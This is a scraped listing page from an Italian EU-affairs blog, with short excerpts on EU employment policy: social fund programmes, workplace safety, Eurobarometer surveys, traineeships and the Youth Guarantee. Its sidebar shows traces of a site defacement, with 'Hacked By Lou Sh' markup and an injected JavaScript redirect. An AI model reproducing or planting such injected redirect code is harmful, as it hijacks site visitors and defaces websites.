EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Lavoro

Lavoro


Lavoro

it

A distanza di due mesi dall’accordo di partenariato tra la Commissione europea e la Francia per definire la migliore strategia per l’utilizzo dei fondi europei, lo scorso 10 ottobre la Commissione europea ha approvato il programma operativo francese per l’attuazione del Fondo sociale europeo (FSE) nella Francia continentale per il periodo 2014-2020.

Il fondo sociale europeo (FSE) ha un ruolo decisivo nel supportare gli investimenti degli Stati membri per ciò che riguarda il capitale umano e aiuta a sostenere la competizione economica europea. Assiste ogni anno 15 milioni di persone per sostenerle nelle loro competenze, per aiutarle ad (...)

it

Investire in una cultura della prevenzione dei rischi, garantendo condizioni migliori sul posto di lavoro, può offrire vantaggi non soltanto sociali ma anche economici, specie in una situazione di crisi come quella odierna. Per questo la Commissione europea ha presentato a Bruxelles un nuovo quadro strategico in materia di salute e sicurezza sul lavoro, con la speranza di bissare i risultati positivi ottenuti nel periodo 2007-2012.

Ogni anno sono più di 3 milioni i lavoratori europei vittime di gravi infortuni sul lavoro, 4 mila dei quali mortali. Infortuni che, insieme alle malattie professionali, colpiscono - come ha ricordato László Andor , Commissario europeo per l’Occupazione, gli affari sociali e l’inclusione - “tutti i (...)

it

Mentre la disoccupazione raggiunge i nuovi massimi storici, in certi settori il lavoro non manca. Anzi, si fatica a trovare mano d’opera. E’ il caso dell’agricoltura, un settore ricco di opportunità per imparare un nuovo mestiere, armati di buona volontà e liberi da pregiudizi.

A tal proposito nasce Job in Country, la nuova piattaforma web di Confederazione Nazionale Coldiretti, come luogo di incontro tra domanda e offerta nel settore agricolo.

L’iniziativa si pone come una grande opportunità per gli studenti degli istituti tecnici agrari, per quelli degli istituti (...)

it

Il 24 aprile sono stati pubblicati i dati emersi dall’indagine Eurobarometro sulla qualità del lavoro in Ue. Dalla ricerca è emersa una grande disparità del livello di soddisfazione lavorativa tra i cittadini dei 28 Stati membri: si passa dal 94% dei lavoratori intervistati in Danimarca che si ritengono soddisfatti della qualità del proprio lavoro, al 16% registrato in Grecia, grado più basso di soddisfazione a livello nazionale.

La situazione evidenziata dall’Eurobarometro, dunque, è disomogenea. Infatti, nonostante la maggioranza dei lavoratori europei sia soddisfatta del proprio impiego, esistono notevoli differenze all’interno degli Stati membri: se da una parte vi sono paesi virtuosi, in cui la qualità lavorativa è (...)

it

Lo scorso 24 marzo sono stati pubblicati i dati Eurobarometro sul lavoro nero in Europa. Le percentuali sono chiare: un cittadino europeo su dieci (11%) ha effettuato acquisti o beneficiato di servizi grazie al lavoro nero ed il 4% riconosce di aver percepito un salario dopo aver prestato il proprio lavoro in nero.

La questione non finisce qui, perché anche una piccola seppur importante fetta di popolazione, il 3%, ha dichiarato di aver ricevuto del denaro in nero al di fuori della propria busta paga. Per poter scongiurare l’ipotesi che queste pratiche possano avanzare ulteriormente, ad aprile la (...)

it

Il documento di indirizzo sugli stage, approvato lo scorso 15 marzo dal Coreper e rivolto ai 28 Paesi membri, ha spinto l’European Youth Forum e altre organizzazioni europee che lavorano sul fronte dell’occupazione giovanile, a scrivere un’animata lettera di protesta.

Il tirocinio, che dovrebbe servire come passerella tra il mondo della formazione e quello del lavoro, spesso diventa uno strumento, nelle mani dei soggetti ospitanti, per sfruttare i giovani stagisti. Per questo, da diversi anni ormai, molte associazioni europee lavorano con lo scopo di (...)

it

La possibilità da parte dei lavoratori di potersi spostare è precondizione per un’elevata crescita e un’elevata attività a livello lavorativo in tutta Europa. Proprio grazie a questi spostamenti e all’ampliamento dell’Ue dal 2004 al 2009, le stime rilevano una crescita del PIL dell’Ue-15 dell’1%. Per questo la Commissione vuole controllare le regole fiscali previste dagli Stati membri.

Spesso sono proprio le difficoltà fiscali ad impedire ai cittadini l’abbandono della propria terra natia per poter cercare occupazione in uno Stato membro diverso dal loro. Per questo, la Commissione europea analizzerà l’aggravio fiscale previsto da ogni Stato membro per valutare se e quanto i (...)

it

Sono 17 gli Stati membri che hanno già presentato alla Commissione europea i loro piani definitivi per attuare la Garanzia per i Giovani, ambizioso programma dell’Unione europea per rispondere alla crisi dell’occupazione giovanile.

Belgio, Bulgaria, Croazia, Cipro, Repubblica Ceca, Francia, Grecia, Ungheria, Irlanda, Italia, Lettonia, Lituania, Polonia, Portogallo, Romania, Spagna e Svezia hanno presentato le road maps per l’implementazione della Youth Guarantee. La Commissione europea sta attualmente valutando i piani e (...)

it

Entrare nel mondo del lavoro non è certo una cosa semplice al giorno d’oggi. L’Europa lo sa bene ed è per questo che ha deciso di intervenire, andando a regolamentare il settore dei tirocini. Un’offerta chiara e una formazione valida in grado di fornire le competenze utili per un futuro impiego: ecco la proposta della Commissione europea.

In un momento di profonda crisi per il mondo del lavoro e per il settore economico, dove la malinconia e lo scetticismo sembrano farla da padrona, un piccolo raggio di luce appare all’orizzonte per noi giovani. L’Unione Europea infatti non si smentisce mai e rilancia il suo impegno per (...)

it

Il Parlamento europeo ha approvato la proposta di legge che prevede per i liberi professionisti come farmacisti, architetti e medici il diritto ad una tessera elettronica, utilizzabile all’interno dell’ambito europeo, per poter svolgere la loro professione non solo all’interno dei confini nazionali, ma anche al di fuori di essi.

La direttiva, una volta giunta al termine dell’iter legislativo, permetterà al professionista di esercitare la sua occupazione nei Paesi membri dell’UE. La proposta di legge, già nella sua prima lettura, è stata approvata da ben 596 europarlamentari, con 37 voti contrari e 31 astenuti. Ora però (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France